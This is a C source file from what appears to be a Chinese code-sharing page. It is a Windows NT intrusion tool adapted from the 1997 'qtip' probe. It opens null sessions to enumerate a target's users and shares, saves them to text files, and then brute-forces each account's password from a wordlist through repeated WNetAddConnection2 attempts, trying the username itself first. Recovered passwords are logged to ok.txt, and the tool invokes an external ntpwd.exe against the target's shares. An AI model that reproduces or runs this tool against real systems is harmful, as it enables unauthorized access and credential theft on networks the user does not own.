📄 建立空连接列举用户.txt
字号:
//建立空连接,是为了列举用户,然后使用WNetAddConnection2暴力猜解口令。
///////////////////////////////////////////////////////////////////////
///////////////////////.h//////////////////////////////////////////
/*
* qtip.h
* 12/04/1997
* twitch
* twitch@aye.net
*
* a quick nt investigative probe. (mis)uses null sessions to collect
* sundry information about a WindowsNT server. distribute as you
* please. be alert, look alive, and act like you kow.
*
* '...i should dismiss him, in order to teach him that pleasure consists
* not in what i enjoy, but in having my own way.'
* -sk, either/or
*/
#include <stdio.h>
#include <windows.h>
#include <winnetwk.h>
#include "lm.h"
#include <wchar.h>
#define k16 16384
#define TARG_LEN 255
#define USER_LEN 22
void handle_error(DWORD);
void prepend_str(char *, char*);
int open_session();
int procure_userlist();
int procure_sharelist();
void parse_cl(int, char **);
void usage(char *);
int powerup();
void bail(const char *);
int close_session();
void get_usr_info(wchar_t *);
int procure_sharelist();
int getpasswd(char addr[60],char name[20],char passwdtxt[20],char ok[20]);
/* couple o globals to make my life easier */
u_int OPT_SHARES, OPT_USERS, OPT_GETUI;
u_int OPT_NODEL, VERB;
char target[TARG_LEN]="\\\\192.168.0.1";
WCHAR utarg[TARG_LEN];
WCHAR user[USER_LEN];
NETRESOURCE nr;
#define LOCALDRIVE "x:"
////.cpp////////////////////////////////////////////////
#include "1.h"
char name[20],nameid[20],usertxt[20]="user.txt",passwdtxt[20]="passwd.txt",ok[20]="ok.txt";
FILE *stream1;
char share[50];
int main(int argc, char *argv[])
{
if(argc==1){
printf("使用:");
printf("\n程序名 \\\\网络地址 列出用户");
printf("\n程序名 \\\\网络地址\\共享驱动器 用户文件 密码文件 输出文件 查找密码\n");
exit (0);
}
if(argc==2){
strcpy(target, argv[argc - 1]);
if( (powerup()) )
return(1);
if( (open_session()) != 0)
return(1);
procure_userlist();
if(procure_sharelist()!=0)
return(1);
close_session();
}
if(argc>2)
{
strcpy(target, argv[1]);
printf("%s\n",argv[2]);
if(strcmp( argv[2], "a" )==0)
{
char run[50]="";
sprintf(run,"ntpwd.exe %s",target);
system(run);
if(procure_sharelist()!=0)
return(1);
sprintf( run, "ntpwd.exe %s l",share);
system(run);
exit(0);
}
if(strcmp( argv[2], "s" )==0)
{
char run[50]="";
sprintf(run,"ntpwd.exe %s",target);
system(run);
strcat(run,"\\c$ l");
system(run);
exit(0);
}
if(strcmp( argv[2], "l" )!=0){
strcpy(usertxt, argv[2]);
if(argc>3)
strcpy(passwdtxt, argv[3]);
if(argc>4)
strcpy(ok, argv[4]);
}
printf("%s %s %s\n",usertxt,passwdtxt,ok);
stream1=fopen(usertxt,"r");
if(stream1==NULL){
printf("文件名错误!!\n");exit(0);
}
printf("请等待。。。。。。\n");
while(fgets(name,20,stream1)!=NULL){
strncpy( nameid, "", 20);
strncpy( nameid, name, strlen(name)-1 );
strncpy( name, "", 20);
if(getpasswd(target,nameid,passwdtxt,ok)==-1){
fclose(stream1);
exit(0);
printf("...无法连接...\n");
}
}
fclose(stream1);
}
return(0);
}
int open_session()
{
DWORD r;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = target;
if(VERB)
printf("establishing null session with %s...\n", target);
r = WNetAddConnection2(&nr, "", "", 0);
if(r != NO_ERROR){
return -1;
}
if(VERB)
printf("connection established\n");
return 0;
}
/*
* procure_userlist()
* just use the old lm NetUserEnum() because there isnt comparable
* functionality in the WNet sect. i just wish the win32 api was
* more bloated and obtuse.
*/
int procure_userlist()
{
NET_API_STATUS nas;
LPBYTE *buf = NULL;
DWORD entread, totent, rhand;
DWORD maxlen = 0xffffffff;
USER_INFO_0 *usrs;
unsigned int i;
int cc = 0;
entread = totent = rhand = nas = 0;
if( (buf = (LPBYTE*)malloc(k16)) == NULL)
printf("malloc probs");
if(VERB)
wprintf(L"\ngetting userlist from %s...\n", utarg);
nas = NetUserEnum(utarg, 0, 0, buf, maxlen, &entread, &totent, &rhand);
if(nas != NERR_Success){
fprintf(stderr, "couldnt enum users, ");
goto cleanup;
}
cc = sizeof(USER_INFO_0) * entread;
if( (usrs = (USER_INFO_0 *)malloc(cc)) == NULL){
fprintf(stderr, "malloc probs\n");
goto cleanup;
}
FILE *stream;
stream=fopen("user.txt","w");
memcpy(usrs, *buf, cc);
if(stream!=NULL){
for(i = 0; i < entread; i++){
wcscpy(user, usrs[i].usri0_name);
wprintf(L"%s\n", user);
fputws(user,stream);
fputs("\n",stream);
// if(VERB)
// get_usr_info(utarg);
}}
fclose(stream);
cleanup:
if(buf)
free(buf);
return 0;
}
int close_session()
{
DWORD r;
WSACleanup();
if(!OPT_NODEL)
r = WNetCancelConnection2(target, 0, TRUE);
if(r != 0){
fprintf(stderr, "couldnt delete %s, returned %d\n", target, r);
return -1;
}
else{
if(VERB)
printf("connection to %s deleted\n", target);
}
return 0;
}
int powerup()
{
int cc = 0, ucc = 0;
ZeroMemory(utarg, TARG_LEN);
cc = strlen(target);
ucc = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, target, cc, utarg, cc);
if(ucc < 1){
return -1;
}
return 0;
}
int getpasswd(char addr[60],char name[20],char passwdtxt[20],char ok[20])
{
char passwd[10],passwdid[10];
FILE *stream2,*stream;
NETRESOURCE nr; DWORD ret;
nr.lpProvider = NULL;
nr.dwType = RESOURCETYPE_ANY ;
nr.lpLocalName = LOCALDRIVE;
nr.lpRemoteName = addr;
ret=WNetAddConnection2(&nr,name,name,0);
if(ret==240)return -1;
if(ret==53)return -1;
if(ret ==NO_ERROR) {stream=fopen(ok,"a");
printf("取得:%s 的密码是: %s \n", name, name);
WNetCancelConnection2(LOCALDRIVE,0,TRUE);
fputs(name,stream);
fputs(" 密码是: ",stream);
fputs(name,stream);
fputs("\n",stream);
fclose(stream);
return 0;
}
stream2=fopen(passwdtxt,"r");
while(fgets(passwd,10,stream2)!=NULL){
strncpy( passwdid, "", 10);
strncpy( passwdid, passwd, strlen(passwd)-1);
strncpy( passwd, "", 10);
printf("%s %s \n", name, passwdid);
ret=WNetAddConnection2(&nr,passwdid,name,0);
if(ret ==NO_ERROR) {stream=fopen(ok,"a");
printf("取得:%s 的密码是: %s \n", name, passwdid);
WNetCancelConnection2(LOCALDRIVE,0,TRUE);
fputs(name,stream);
fputs(" 密码是: ",stream);
fputs(passwdid,stream);
fputs("\n",stream);
fclose(stream);
return 0;
}
}fclose(stream2);
return 0;
}
int procure_sharelist()
{
DWORD r;
DWORD bufsize = 16384, cnt = 0xFFFFFFFF;
HANDLE enhan;
void *buf;
NETRESOURCE *res;
u_int i;
if( (buf = malloc(bufsize)) == NULL){
return -1;
}
nr.dwScope = RESOURCE_CONNECTED;
nr.dwType = RESOURCETYPE_ANY;
nr.dwDisplayType = 0;
nr.dwUsage = RESOURCEUSAGE_CONTAINER;
nr.lpLocalName = NULL;
nr.lpRemoteName = (LPTSTR)target;
nr.lpComment = NULL;
nr.lpProvider = NULL;
r = WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_ANY,
RESOURCEUSAGE_CONNECTABLE, &nr
, &enhan);
if(r != 0){
free(buf);
return -1;
}
r = WNetEnumResource(enhan, &cnt, buf, &bufsize);
if(r != 0){
free(buf);
printf("no share\n");
return -1;
}
res = (NETRESOURCE*)malloc(cnt * sizeof(NETRESOURCE));
if(res == NULL){
free(buf);
return -1;
}
memcpy(res, buf, (cnt * sizeof(NETRESOURCE)) );
FILE *stream;
stream=fopen("share.txt","w");
if(stream!=NULL){
for(i = 0; i < cnt; i++){
printf("%s\n", res[i].lpRemoteName);
sprintf(share,"%s",res[i].lpRemoteName);
fputs(res[i].lpRemoteName,stream);
fputs("\n",stream);
}
}
fclose(stream);
free(buf);
free(res);
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -